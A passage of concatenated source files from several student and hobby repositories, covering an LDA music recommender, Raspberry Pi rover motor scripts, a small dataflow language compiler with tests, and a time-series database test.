a document consisting only of that node itself. Finally we take the cosine similarity. Note that the inference on a single-word
document SHOULD be equivalent to iterating through the cluster node distributions and taking that node's probability from each -- not sure which
is faster.
'''
partition_index = self._find_partition_index(node)
# check to see that the lda model has been trained
self._check_lda_model(partition_index)
# get distribution for our node
normalized_gamma = self._find_forwards_node_cluster_distribution(node, partition_index)
# bag_rep = self._node_to_bagofneighbors(node)
# gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
# gamma, sstats = self.lda_models[partition_index].inference([gensim_bow])
# normalized_gamma= gamma[0]/sum(gamma[0])
scores = {}
scores_cosine_sim = {}
for node_to_check in self.nodes[partition_index^1]:
# cosine similarity:
# run inference on just the song to find the song's cluster distribution
new_bag_rep = [str(node_to_check)]
nnormalized_gamma = self._bag_rep_to_gamma(new_bag_rep, partition_index)
# new_gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
# ngamma, nsstats = self.lda_models[partition_index].inference([gensim_bow])
# nnormalized_gamma = ngamma[0]/sum(ngamma[0])
# take cosine similarity
scores_cosine_sim[node_to_check] = cosine_similarity(nnormalized_gamma, normalized_gamma)
#probability of generation:
#score = P(s|u) = sum over t (P(t|u)P(s|t)). P(t|u) = normalized_gamma[dist_index], P(s|t) = per_cluster_node_dist[part_index][dist_index][str(node_to_check)]
score = sum([self.per_cluster_node_distributions[partition_index][dist_index][str(node_to_check)]*normalized_gamma[dist_index] for dist_index in range(len(self.per_cluster_node_distributions[partition_index]))])
scores[node_to_check] = score
return scores, scores_cosine_sim
def _find_backwards_node_cluster_distribution(self, node, partition_index):
return [distribution[str(node)] for distribution in self.per_cluster_node_distributions[partition_index]]
def _find_backwards_similarity(self,node, other_node, partition_index):
'''
function: _find_backwards_similarity
params: node - node we are recommending for
other_node - node we want to find similarity to
partition_index - which partition both nodes are in
returns: cosine similarity between the two nodes (they are in the same partition)
notes: backwards similarity uses LDA that treats songs as generating users; each user has a distribution over topics that it is in,
and backwards similarity is the cosine similarity of that topic distribution vector. Cosine similarity means that users
who are similar but don't "like" as many songs are still considered similar
'''
# other partition index because we're doing backwards LDA
partition_index = partition_index^1
# check to see that the lda model has been trained
self._check_lda_model(partition_index)
#get the cluster distribution of our node
node_cluster_distribution = self._find_backwards_node_cluster_distribution(node, partition_index)
#get the cluster distribution of the other node
other_node_cluster_distribution = self._find_backwards_node_cluster_distribution(other_node, partition_index)
#return cosine similarity
return cosine_similarity(node_cluster_distribution, other_node_cluster_distribution)
def _bag_rep_to_gamma(self, bag_rep, partition_index):
gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
gamma, sstats = self.lda_models[partition_index].inference([gensim_bow])
normalized_gamma= gamma[0]/sum(gamma[0])
return normalized_gamma
def _find_forwards_node_cluster_distribution(self, node, partition_index):
bag_rep = self._node_to_bagofneighbors(node)
return self._bag_rep_to_gamma(bag_rep, partition_index)
# gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
# gamma, sstats = self.lda_models[partition_index].inference([gensim_bow])
# normalized_gamma= gamma[0]/sum(gamma[0])
# return normalized_gamma
def _find_forwards_similarity(self,node, other_node, partition_index):
'''
function: _find_forwards_similarity
params: node - node we are recommending for
other_node - node we want to find similarity to
partition_index - which partition both nodes are in
returns: cosine similarity between the two nodes (they are in the same partition)
notes: forwards similarity models users generating songs. Each user has a per-user cluster distribution.
we take cosine similarity of these distributions.
'''
#check to see that lda model has been trained
self._check_lda_model(partition_index)
#get the cluster distribution of our node
node_cluster_distribution = self._find_forwards_node_cluster_distribution(node, partition_index)
#get the cluster distribution of the other node
other_node_cluster_distribution = self._find_forwards_node_cluster_distribution(other_node, partition_index)
#return cosine similarity
return cosine_similarity(node_cluster_distribution, other_node_cluster_distribution)
def find_most_similar_user(self,node):
partition_index = self._find_partition_index(node)
backwards_sim = {}
forwards_sim = {}
# iterate through other nodes on node's side of the bipartite graph
for other_node in self.nodes[partition_index]:
backwards_similarity = self._find_backwards_similarity(node, other_node, partition_index)
forwards_similarity = self._find_forwards_similarity(node, other_node, partition_index)
# dicts for testing purposes, to see relationships
backwards_sim[other_node] = backwards_similarity
forwards_sim[other_node] = forwards_similarity
return backwards_sim, forwards_sim
def initialize_feature_mappings(self, node):
partition_index = self._find_partition_index(node)
backwards_psu, nodes_sorted = self.backwards_LDA_psu(node)
forwards_psu, forwards_cosine_sim = self.forwards_LDA_psu(node)
backwards_sim, forwards_sim = self.find_most_similar_user(node)
self.mappings += [backwards_psu, forwards_psu, forwards_cosine_sim]
self.nodes_sorted = nodes_sorted
# self.mappings['backwards_psu'] = backwards_psu
# self.mappings['fowards_psu'] = forwards_psu
# self.mappings['forwards_cosine_sim'] = forwards_cosine_sim
return partition_index
def gather_data(self, dump_file_path, partition_index):
'''
function: gather_data
params: dump_file_path - path to dump the outputted json file into
partition_index - partition to loop through
returns: the data that is json'd at the end
notes: usage is to loop through all the nodes and ask the user for a rating of it. on ending the loop,
the data is json'd into dump_file_path
'''
ratings = []
try:
# loop through nodes
for node in self.nodes_sorted:
# for node in self.nodes[partition_index]:
print "Here's the next data element:"
self.print_node(node)
print "\n\n"
features = self.feature_factory(node)
# get rating
rating = raw_input("Rating? (must be an int) ---> ")
sure = raw_input("Are you sure? (y/n) ---> ")
while (sure != "y"):
rating = raw_input("Rating? ---> ")
sure = raw_input("Are you sure? (y/n) ---> ")
ratings.append(features + [int(rating)])
except KeyboardInterrupt:
print "Shutting down. Do not press anything."
# dump json
json.dump(ratings, open(dump_file_path + str(time.time() + '.json'), 'w'))
return ratings
return ratings
# ======= [ UTILS ] ========= #
def cosine_similarity(u, v):
return np.dot(u,v) / (np.sqrt(np.dot(u,u)) * np.sqrt(np.dot(v,v)))
```
#### File: OpenSource/pd_to_lda/utils.py
```python
from functools import partial
from pd_lda import pd_lda
import pandas as pd
df = pd.read_pickle('calendar_events_old.df')
df_one = df[:len(df)-20]
df_two = df[len(df)-20:len(df)]
pdlda = pd_lda()
model = pdlda.update_lda(df_one, ['name'])
print model.show_topic(1)
# mymodel = model.copy()
new_model = pdlda.update_lda(df_two, ['name'])
print new_model.show_topic(1)
new_df = pdlda.add_lda_column(df, ['name'], new_model)
class mytest(object):
def __init__(self):
self.x = 33
def realtest(self, index):
return index + self.x
def tester(self):
x = map(self.realtest, range(10))
print x
def func1(self, y, z):
print "first: " + str(y)
print "second: " + str(z)
def test(self):
new = partial(self.func1, 2)
new(3)
``` |
{
"source": "2062GlossyLedge/Rover-projects",
"score": 3
} |
#### File: Rover-projects/autonomous rover #1/HC-SR04+servo.py
```python
from gpiozero import AngularServo
from gpiozero import DistanceSensor
from time import sleep
s = AngularServo(18, min_angle=-90, max_angle=90)
#Ultrasonic sensor reads distance for the whole program
sensor = DistanceSensor(echo=27, trigger=17)
s.mid()
obstacle = 10
object_distance = sensor.distance * 100
print(object_distance)
#move forward from rest
def when_object_in_front():
while True:
if object_distance <= obstacle:
s.max()
sleep(4)
#reverse, turn left, move forward
continue
#a1 will only look for obstacles by turning left
#if object_distance <= obstacle:
#s.min()
#sleep(4)
#reverse
#continue
elif object_distance > obstacle:
#Drive forward
continue
when_object_in_front()
```
#### File: Rover-projects/autonomous rover #2/a2_rover4.py
```python
import RPi.GPIO as GPIO
from time import sleep
x = 100
#en changes speed of motor
enA = 25
enB = 16
enC = 26
enD = 22
#bottom right motor - motor1
in1 = 24
in2 = 23
#top right motor - motor 2
in3 = 20
in4 = 21
#top left motor - motor 3
in1_2 = 19
in2_2 = 13
#bottom left motor - motor 4
in3_2 = 17
in4_2 = 27
GPIO.setmode(GPIO.BCM)
#motor 1
GPIO.setup(in1,GPIO.OUT)
GPIO.setup(in2,GPIO.OUT)
GPIO.setup(enA,GPIO.OUT)
p1 = GPIO.PWM(enA,1000)
p1.start(25)
#motor 2
GPIO.setup(in3,GPIO.OUT)
GPIO.setup(in4,GPIO.OUT)
GPIO.setup(enB,GPIO.OUT)
p2 = GPIO.PWM(enB,1000)
p2.start(25)
#motor 3
GPIO.setup(in1_2,GPIO.OUT)
GPIO.setup(in2_2,GPIO.OUT)
GPIO.setup(enC,GPIO.OUT)
p3 = GPIO.PWM(enC,1000)
p3.start(25)
#motor 4
GPIO.setup(in3_2,GPIO.OUT)
GPIO.setup(in4_2,GPIO.OUT)
GPIO.setup(enD,GPIO.OUT)
p4 = GPIO.PWM(enD,1000)
p4.start(25)
def forward():
print("going forwards")
p1.ChangeDutyCycle(x)
p2.ChangeDutyCycle(x)
p3.ChangeDutyCycle(x)
p4.ChangeDutyCycle(x)
GPIO.output(in3,GPIO.HIGH)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.HIGH)
GPIO.output(in2,GPIO.LOW)
GPIO.output(in1_2,GPIO.LOW)
GPIO.output(in2_2,GPIO.HIGH)
GPIO.output(in3_2,GPIO.LOW)
GPIO.output(in4_2,GPIO.HIGH)
def backward():
print("going backwards")
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.HIGH)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
GPIO.output(in1_2,GPIO.HIGH)
GPIO.output(in2_2,GPIO.LOW)
GPIO.output(in3_2,GPIO.HIGH)
GPIO.output(in4_2,GPIO.LOW)
def stop():
print("stopping")
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
GPIO.output(in1_2,GPIO.LOW)
GPIO.output(in2_2,GPIO.LOW)
GPIO.output(in3_2,GPIO.LOW)
GPIO.output(in4_2,GPIO.LOW)
def turn_left():
print("turning left")
GPIO.output(in3,GPIO.HIGH)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.HIGH)
GPIO.output(in2,GPIO.LOW)
GPIO.output(in1_2,GPIO.LOW)
GPIO.output(in2_2,GPIO.LOW)
GPIO.output(in3_2,GPIO.LOW)
GPIO.output(in4_2,GPIO.LOW)
def turn_right():
print("turning right")
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
GPIO.output(in1_2,GPIO.LOW)
GPIO.output(in2_2,GPIO.HIGH)
GPIO.output(in3_2,GPIO.LOW)
GPIO.output(in4_2,GPIO.HIGH)
def sharp_left():
#left wheels forwards while right wheels backwards ---????
while(1):
command = input("Enter 's' to start the rover: ")
if command == 's':
forward()
sleep(3)
backward()
sleep(3)
stop()
sleep(3)
turn_left()
sleep(10)
turn_right()
sleep(10)
stop()
else:
print("You entered the wrong command. Try again")
```
#### File: Rover-projects/autonomous rover #3/a3_rover2.py
```python
rom gpiozero import LineSensor
import RPi.GPIO as GPIO
from time import sleep
x = 75
x1 = 0
x2 = 100
sensor1 = LineSensor(26)
sensor2 = LineSensor(16)
enA = 25
enB = 12
in1 = 24
in2 = 23
in3 = 20
in4 = 21
GPIO.setmode(GPIO.BCM)
#motor 1
GPIO.setup(in1,GPIO.OUT)
GPIO.setup(in2,GPIO.OUT)
GPIO.setup(enA,GPIO.OUT)
p1 = GPIO.PWM(enA,1000)
p1.start(25)
#motor 2
GPIO.setup(in3,GPIO.OUT)
GPIO.setup(in4,GPIO.OUT)
GPIO.setup(enB,GPIO.OUT)
p2 = GPIO.PWM(enB,1000)
p2.start(25)
def forward():
print("going forwards")
p1.ChangeDutyCycle(x)
p2.ChangeDutyCycle(x)
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.HIGH)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
def turn_left():
print("turning left")
p1.ChangeDutyCycle(x1)
p2.ChangeDutyCycle(x2)
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.HIGH)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
def turn_right():
print("turning right")
p1.ChangeDutyCycle(x2)
p2.ChangeDutyCycle(x1)
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
def stop():
print("stopping")
GPIO.output(in3,GPIO.LOW)
GPIO.output(in4,GPIO.LOW)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
def stay_on_line():
print("staying on line")
forward()
def straighten():
print("straightening")
stop()
sleep(1)
turn_left()
sleep(1)
stop()
sleep(1)
turn_right()
sleep(1)
stop()
sleep(1)
sensor1.when_line = stay_on_line
sensor1.when_no_line = straighten
sensor2.when_line = stay_on_line
sensor2.when_no_line = straighten
``` |
{
"source": "2065983Y/spinner",
"score": 3
} |
#### File: 2065983Y/spinner/Block.py
```python
class Block(object):
def __init__(self, name, type, x, y):
self.name = name
self.type = type
``` |
{
"source": "207leftovers/cs207project",
"score": 3
} |
#### File: cs207project/procs/_nfft.py
```python
import numpy as np
from numpy.fft import *
def _spread(y, yy, n, x, m):
"""
Given an array yy, extirpolate a value y into
m actual array elements that best approximate the array element number x.
Need to call for every value in an array(In place operations)
Input -
y - Input value
yy - Actual array to which value is to be extirpolated
n - Maximum frequency
x - Element number being approximated
m - Number of points to be interpolated for 1/4th cycle.
"""
nfac=[0,1,1,2,6,24,120,720,5040,40320,362880]
if m > 10. :
print('factorial table too small in spread')
return
ix=int(x)
if x == float(ix):
yy[ix]=yy[ix]+y
else:
ilo = int(x-0.5*float(m)+1.0)
ilo = min( max( ilo , 1 ), n-m+1 )
ihi = ilo+m-1
nden = nfac[m]
fac=x-ilo
for j in range(ilo+1,ihi+1):
fac = fac*(x-j)
yy[ihi] = yy[ihi] + y*fac/(nden*(x-ihi))
for j in range(ihi-1,ilo-1,-1):
nden=(nden/(j+1-ilo))*(j-ihi)
yy[j] = yy[j] + y*fac/(nden*(x-j))
def _nfft(mag, time,ofac,hifac, MACC=4):
"""
Input-
mag - List of magnitudes
time - List of time values corresponding to the magnitude
ofac - Oversampling factor
hifac - Highest frequency for which periodogram is to be constructed.
Output-
Wk1 : An array of frequencies.
Wk2 : An array of corresponding values of the periodogram.
nout : Wk1 & Wk2 dimensions (number of calculated frequencies)
"""
n = len(time)
#Arrays are to be of length if its possible to get the FFT
assert n == len(mag)
nout = 0.5*ofac*hifac*n
nfreqt = ofac*hifac*n*MACC #Size the FFT as next power
nfreq = 64 # of 2 above nfreqt.
while nfreq < nfreqt:
nfreq = 2*nfreq
ndim = 2*nfreq
#Compute the mean, variance
mean = np.mean(mag)
##sample variance because the divisor is N-1
var = ((mag-mean)**2).sum()/(len(mag)-1)
# and range of the data.
xmin = time.min()
xmax = time.max()
xdif = xmax-xmin
fac = ndim/(xdif*ofac)
fndim = ndim
ck = ((time-xmin)*fac) % fndim
ckk = (2.0*ck) % fndim
#extirpolate the data
wk1 = np.zeros(ndim, dtype='complex')
wk2 = np.zeros(ndim, dtype='complex')
#calling spread in order to compute FFT later
for j in range(0, n):
_spread(mag[j]-mean,wk1,ndim,ck[j],MACC)
_spread(1.0,wk2,ndim,ckk[j],MACC)
#Take the Fast Fourier Transforms
wk1 = ifft( wk1 )*len(wk1)
wk2 = ifft( wk2 )*len(wk1)
wk1 = wk1[1:nout+1]
wk2 = wk2[1:nout+1]
real_wk1 = wk1.real
imag_wk1 = wk1.imag
real_wk2 = wk2.real
imag_wk2 = wk2.imag
#Diff factor
df = 1.0/(xdif*ofac)
#Compute the Lomb value for each frequency
hypo = 2.0 * abs(wk2)
#hc2wt - Represents half cos(2*w*t) term
#hs2wt - Represents half sin(2*w*t) term
hc2wt = real_wk2/hypo
hs2wt = imag_wk2/hypo
#cwt - Represents cos(w*t) term
#swt - Represents sin(w*t) term
cwt = np.sqrt(0.5+hc2wt)
swt = np.sign(hs2wt)*(np.sqrt(0.5-hc2wt))
#den - calculating denominator in order to compute the sin and cos term
den = 0.5*n+hc2wt*real_wk2+hs2wt*imag_wk2
#cterm - cos term coefficients
#sterm - sin term coefficients
cterm = (cwt*real_wk1+swt*imag_wk1)**2./den
sterm = (cwt*imag_wk1-swt*real_wk1)**2./(n-den)
#Computing the final periodogram values and building the scale of frequencies
wk1 = df*(np.arange(nout, dtype='float')+1.)
wk2 = (cterm+sterm)/(2.0*var)
return wk1, wk2, nout
```
#### File: cs207project/pype/optimize.py
```python
from .fgir import *
from .error import *
# Optimization pass interfaces
class Optimization(object):
def visit(self, obj): pass
class FlowgraphOptimization(Optimization):
'''Called on each flowgraph in a FGIR.
May modify the flowgraph by adding or removing nodes (return a new Flowgraph).
If you modify nodes, make sure inputs, outputs, and variables are all updated.
May NOT add or remove flowgraphs.'''
pass
class TopologicalFlowgraphOptimization(Optimization):
'''Called on each flowgraph in a FGIR, in dependent order.
Components which are used by other components will be called first.'''
pass
class NodeOptimization(Optimization):
'''Called on each node in a FGIR.
May modify the node (return a new Node object, and it will be assigned).
May NOT remove or add nodes (use a component pass).'''
pass
class TopologicalNodeOptimization(NodeOptimization): pass
# Optimization pass implementations
class PrintIR(TopologicalNodeOptimization):
'A simple "optimization" pass which can be used to debug topological sorting'
def visit(self, node):
print(str(node))
class AssignmentEllision(FlowgraphOptimization):
'''Eliminates all assignment nodes.
Assignment nodes are useful for the programmer to reuse the output of an
expression multiple times, and the lowering transformation generates explicit
flowgraph nodes for these expressions. However, they are not necessary for
execution, as they simply forward their value. This removes them and connects
their pre- and post-dependencies.'''
def visit(self, flowgraph):
# Check all the nodes in the flowgraph and remove assigment nodes
to_remove = []
# Keeps track of the predecessors to nodes to be removed
to_remove_inputs = {}
# Find all assignment nodes to remove
for node in flowgraph.nodes.keys():
# If the node is an assigment, eliminate it
if flowgraph.nodes[node].type == FGNodeType.assignment:
to_remove.append(node)
to_remove_inputs[node] = flowgraph.nodes[node].inputs
# Update the nodes that are before and after the assignment nodes
for node in flowgraph.nodes.keys():
for to_remove_node in to_remove_inputs:
if to_remove_node in flowgraph.nodes[node].inputs:
flowgraph.nodes[node].inputs.remove(to_remove_node)
flowgraph.nodes[node].inputs.extend(to_remove_inputs[to_remove_node])
for var in flowgraph.variables:
node = flowgraph.variables[var]
if node in to_remove:
flowgraph.variables[var] = to_remove_inputs[node][0]
# Clear out the nodes that should be removed
for node_to_remove in to_remove:
del flowgraph.nodes[node_to_remove]
return flowgraph
class DeadCodeElimination(FlowgraphOptimization):
'''Eliminates unreachable expression statements.
Statements which never affect any output are effectively useless, and we call
these "dead code" blocks. This optimization removes any expressions which can
be shown not to affect the output.
NOTE: input statements *cannot* safely be removed, since doing so would change
the call signature of the component. For example, it might seem that the input
x could be removed:
{ component1 (input x y) (output y) }
but imagine this component1 was in a file alongside this one:
{ component2 (input a b) (:= c (component a b)) (output c) }
By removing x from component1, it could no longer accept two arguments. So in
this instance, component1 will end up unmodified after DCE.'''
def visit(self, flowgraph):
# Check all the nodes in the flowgraph and remove dead nodes
# Start with assuming all nodes should be removed, and then
# work backwards from the outputs to remove unused ones
to_remove = list(flowgraph.nodes.keys())
# Need to copy this list, otherwise you are modifying the originals
to_check = flowgraph.outputs[:]
while len(to_check) > 0:
cur = to_check.pop()
to_remove.remove(cur)
# Add all previous to the to_check queue
for key in flowgraph.nodes[cur].inputs:
if key in to_remove and key not in to_check:
to_check.append(key)
# Now eliminate whatever is left and hasn't been visited
if len(to_remove) > 0:
print("Removing nodes", to_remove)
for key in to_remove:
del flowgraph.nodes[key]
to_remove_vars = []
# Remove unused variables as well
for var in flowgraph.variables:
node = flowgraph.variables[var]
if node in to_remove:
to_remove_vars.append(var)
for var in to_remove_vars:
del flowgraph.variables[var]
return flowgraph
class InlineComponents(TopologicalFlowgraphOptimization):
'''Replaces every component invocation with a copy of that component's flowgraph.
Topological order guarantees that we inline components before they are invoked.'''
def __init__(self):
self.component_cache = {}
def visit(self, flowgraph):
for (cnode_id, cnode) in [(nid,n) for (nid,n) in flowgraph.nodes.items() if n.type==FGNodeType.component]:
target = self.component_cache[cnode.ref]
# Add a copy of every node in target flowgraph
id_map = {} # maps node id's in the target to node id's in our flowgraph
for tnode in target.nodes.values():
if tnode.type==FGNodeType.input or tnode.type==FGNodeType.output:
newtype = FGNodeType.forward
else:
newtype = tnode.type
n = flowgraph.new_node(newtype, ref=tnode.ref)
id_map[tnode.nodeid] = n.nodeid
# Connect all copies together
for tid,tnode in target.nodes.items():
flowgraph.nodes[id_map[tid]].inputs = [id_map[i] for i in tnode.inputs]
# Link inputs of cnode to inputs of target flowgraph
for cnode_input,targ_input in zip(cnode.inputs, target.inputs):
flowgraph.nodes[id_map[targ_input]].inputs = [cnode_input]
# Link output of target flowgraph to outputs of cnode
for oid,onode in flowgraph.nodes.items():
if cnode_id in onode.inputs:
onode.inputs[onode.inputs.index(cnode_id)] = id_map[target.outputs[0]]
# Remove all other references to cnode in flowgraph
del flowgraph.nodes[cnode_id]
victims = [s for s,nid in flowgraph.variables.items() if nid==cnode_id]
for v in victims:
del flowgraph.variables[v]
self.component_cache[flowgraph.name] = flowgraph
return flowgraph
```
#### File: cs207project/pype/semantic_analysis.py
```python
from pype.ast import *
from pype.error import *
class PrettyPrint(ASTVisitor):
def __init__(self):
pass
def visit(self, node):
print(node.__class__.__name__)
class CheckSingleAssignment(ASTVisitor):
def __init__(self):
self.component_names = []
self.names_used = []
def visit(self, node):
#if the visitor visits a component, check if the name is taken. if it is not, initialize
#an empty list for the component and insert into dictionary
if isinstance(node, ASTComponent):
self.names_used = []
new_component_name = node.name.name
if new_component_name in self.component_names:
raise PypeSyntaxError('Component name: ' + new_component_name +' has already been taken')
else:
self.component_names.append(new_component_name)
elif isinstance(node, ASTAssignmentExpr):
name = node.binding.name
if name in self.names_used:
raise PypeSyntaxError('Node name: ' + name + ' has already been taken')
else:
self.names_used.append(name)
elif isinstance(node, ASTInputExpr):
for input_expression in node.children:
name = input_expression.name
if name in self.names_used:
raise PypeSyntaxError('Node name: ' + name + ' has already been taken')
else:
self.names_used.append(name)
class CheckSingleIOExpression(ASTVisitor):
def __init__(self):
self.component = None
self.component_has_input = False
self.component_has_output = False
def visit(self, node):
if isinstance(node, ASTComponent):
self.component = node.name.name
self.component_has_input = False
self.component_has_output = False
elif isinstance(node, ASTInputExpr):
if self.component_has_input:
raise PypeSyntaxError('Component '+str(self.component)+' has multiple input expressions')
self.component_has_input = True
elif isinstance(node, ASTOutputExpr):
if self.component_has_output:
raise PypeSyntaxError('Component '+str(self.component)+' has multiple output expressions')
self.component_has_output = True
class CheckUndefinedVariables(ASTVisitor):
def __init__(self, symtab):
self.symtab = symtab
self.scope=None
def visit(self, node):
if isinstance(node, ASTComponent):
self.scope = node.name.name
elif isinstance(node, ASTID):
print(node.name)
if self.symtab.lookupsym(node.name, scope=self.scope) is None:
raise PypeSyntaxError('Undefined variable: ' + str(node.name))
```
#### File: tests/procs/test_corr.py
```python
import numpy as np
np.random.seed(0)
from procs import _corr
from timeseries import TimeSeries
def test_tsmaker():
#Setting seed to equate the two timeseries
_,t1 = _corr.tsmaker(0.5, 0.1, 0.01)
assert(len(t1.values()) == 100)
def test_randomts():
t1 = _corr.random_ts(0.5)
assert(len(t1.values()) == 100)
def test_stand():
t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
val = _corr.stand(np.array(t1.values()), 55.0, 10)
assert(list(val) == [-1.5, -0.5, 0.5, 1.5])
def test_ccor():
#Testing the corr function independently
t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
t2 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
val = _corr.ccor(t1, t2)
assert(list(np.real(val)) == [12600, 12000, 11800, 12000])
assert(list(np.imag(val)) == [0, 0, 0, 0])
def test_maxcorr():
t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
t2 = TimeSeries([1, 2, 3, 4], [50, 60, 70, 40])
standts1 = _corr.stand(t1, t1.mean(), t1.std())
standts2 = _corr.stand(t2, t2.mean(), t2.std())
idx, mcorr = _corr.max_corr_at_phase(standts1, standts2)
#idx should be equal to one since the second ts is shifted by 1
assert(idx == 1)
assert(np.real(mcorr) == 4)
def test_kernelcorr():
t1 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
t2 = TimeSeries([1, 2, 3, 4], [40, 50, 60, 70])
standts1 = _corr.stand(t1, t1.mean(), t1.std())
standts2 = _corr.stand(t2, t2.mean(), t2.std())
#Kernel_corr should return a correlation of 1.0 since we use similar timeseries
assert(_corr.kernel_corr(standts1, standts2, mult=1) == 1.0)
```
#### File: tests/pype/test_fgir.py
```python
from pype import fgir
from pype.translate import SymbolTableVisitor, LoweringVisitor
from pype.optimize import *
from pype import lexer
from pype import parser
from pype import ast
from pype.semantic_analysis import CheckSingleAssignment, CheckSingleIOExpression, PrettyPrint, CheckUndefinedVariables
from timeseries import TimeSeries
input = """(import timeseries)
{ standardize
(input (TimeSeries t))
(:= mu (mean t))
(:= sig (std t))
(:= new_t (/ (- t mu) sig))
(output new_t)
}"""
ast = parser.parse(input, lexer=lexer)
syms = ast.walk( SymbolTableVisitor() )
ir = ast.mod_walk( LoweringVisitor(syms) )
standardize_graph = ir.graphs['standardize']
def test_nodes():
assert(standardize_graph.nodes['@N0'].nodeid == '@N0')
assert(standardize_graph.nodes['@N0'].inputs == [])
assert(standardize_graph.nodes['@N0'].ref == None)
assert(standardize_graph.nodes['@N0'].__repr__() == '<FGNodeType.input @N0<= : None>')
assert(standardize_graph.nodes['@N1'].nodeid == '@N1')
assert(standardize_graph.nodes['@N1'].inputs == ['@N0'])
assert(standardize_graph.nodes['@N1'].ref == TimeSeries.mean)
assert(standardize_graph.nodes['@N2'].nodeid == '@N2')
assert(standardize_graph.nodes['@N2'].inputs == ['@N1'])
assert(standardize_graph.nodes['@N2'].ref == None)
assert(standardize_graph.nodes['@N3'].nodeid == '@N3')
assert(standardize_graph.nodes['@N3'].inputs == ['@N0'])
assert(standardize_graph.nodes['@N3'].ref == TimeSeries.std)
assert(standardize_graph.nodes['@N4'].nodeid == '@N4')
assert(standardize_graph.nodes['@N4'].inputs == ['@N3'])
assert(standardize_graph.nodes['@N4'].ref == None)
assert(standardize_graph.nodes['@N5'].nodeid == '@N5')
assert(standardize_graph.nodes['@N5'].inputs == ['@N0', '@N2'])
assert(standardize_graph.nodes['@N5'].ref == TimeSeries.__sub__)
def test_topological_sort():
dotfile = standardize_graph.dotfile()
sorted_nodes = standardize_graph.topological_sort()
# Ensure that the dotfile print out hasn't been affected by topological sort
assert(dotfile == standardize_graph.dotfile())
# Check input is first
assert(sorted_nodes[0] == '@N0')
# Check output is last
assert(sorted_nodes[-1] == '@N8')
# Check some orderings
assert(sorted_nodes.index('@N5') > sorted_nodes.index('@N0'))
assert(sorted_nodes.index('@N5') > sorted_nodes.index('@N2'))
assert(sorted_nodes.index('@N4') > sorted_nodes.index('@N3'))
assert(sorted_nodes.index('@N2') > sorted_nodes.index('@N1'))
assert(sorted_nodes.index('@N1') > sorted_nodes.index('@N0'))
```
#### File: tests/pype/test_pcode.py
```python
import sys
import os
from pype.pipeline import *
from timeseries.TimeSeries import TimeSeries
from pype.pcode import PCodeGenerator
sys.path.append('/samples/')
input1 = """(import timeseries)
{ standardize
(input (TimeSeries t))
(:= mu (mean t))
(:= sig (std t))
(:= new_t (/ (- t mu) sig))
(output new_t)
}"""
def test_pcode_l():
time = []
values = []
for x in range(100):
time.append(x)
values.append(x-50)
a = TimeSeries(time, values)
ast = parser.parse(input1, lexer=lexer)
# Semantic analysis
ast.walk( CheckSingleAssignment() )
ast.walk( CheckSingleIOExpression() )
syms = ast.walk( SymbolTableVisitor() )
ast.walk( CheckUndefinedVariables(syms) )
# Translation
ir = ast.mod_walk( LoweringVisitor(syms) )
ir.flowgraph_pass( AssignmentEllision() )
ir.flowgraph_pass( DeadCodeElimination() )
ir.topological_flowgraph_pass( InlineComponents() )
# PCode Generation
pcodegen = PCodeGenerator()
ir.flowgraph_pass( pcodegen )
pcodes = pcodegen.pcodes
standardized_TS = pcodes['standardize'].run(a)
# Test the mean and standard deviation
assert(round(standardized_TS.mean(), 7) == 0)
assert(round(standardized_TS.std()-1, 7) == 0)
def test_pcode_2():
input2 = """{aer
(input b)
(:= a "a")
(output a)
}"""
ast = parser.parse(input2, lexer=lexer)
# Semantic analysis
ast.walk( CheckSingleAssignment() )
ast.walk( CheckSingleIOExpression() )
syms = ast.walk( SymbolTableVisitor() )
ast.walk( CheckUndefinedVariables(syms) )
# Translation
ir = ast.mod_walk( LoweringVisitor(syms) )
ir.flowgraph_pass( AssignmentEllision() )
ir.flowgraph_pass( DeadCodeElimination() )
ir.topological_flowgraph_pass( InlineComponents() )
# PCode Generation
pcodegen = PCodeGenerator()
ir.flowgraph_pass( pcodegen )
pcodes = pcodegen.pcodes
a = pcodes['aer'].run('b')
assert(a == '"a"')
```
#### File: tests/tsdb/test_tsdb_server.py
```python
from tsdb import TSDBServer, DictDB, TSDBClient, TSDBProtocol
import timeseries as ts
from concurrent.futures import ThreadPoolExecutor, thread
from tsdb.tsdb_ops import *
from collections import defaultdict, OrderedDict
from importlib import import_module
import time
import numpy as np
import asynctest
import procs
identity = lambda x: x
schema = {
'pk': {'convert': identity, 'index': None}, #will be indexed anyways
'ts': {'convert': identity, 'index': None},
'order': {'convert': int, 'index': 1},
'blarg': {'convert': int, 'index': 1},
'useless': {'convert': identity, 'index': None},
'mean': {'convert': float, 'index': 1},
'std': {'convert': float, 'index': 1},
'vp': {'convert': bool, 'index': 1}
}
NUMVPS = 5
# we augment the schema by adding columns for 5 vantage points
for i in range(NUMVPS):
schema["d_vp-{}".format(i)] = {'convert': float, 'index': 1}
class Test_TSDB_Protocol():
def test_protocol(self):
db = DictDB(schema, 'pk')
server = TSDBServer(db)
prot = TSDBProtocol(server)
# Dumb server tests
assert(server.db == db)
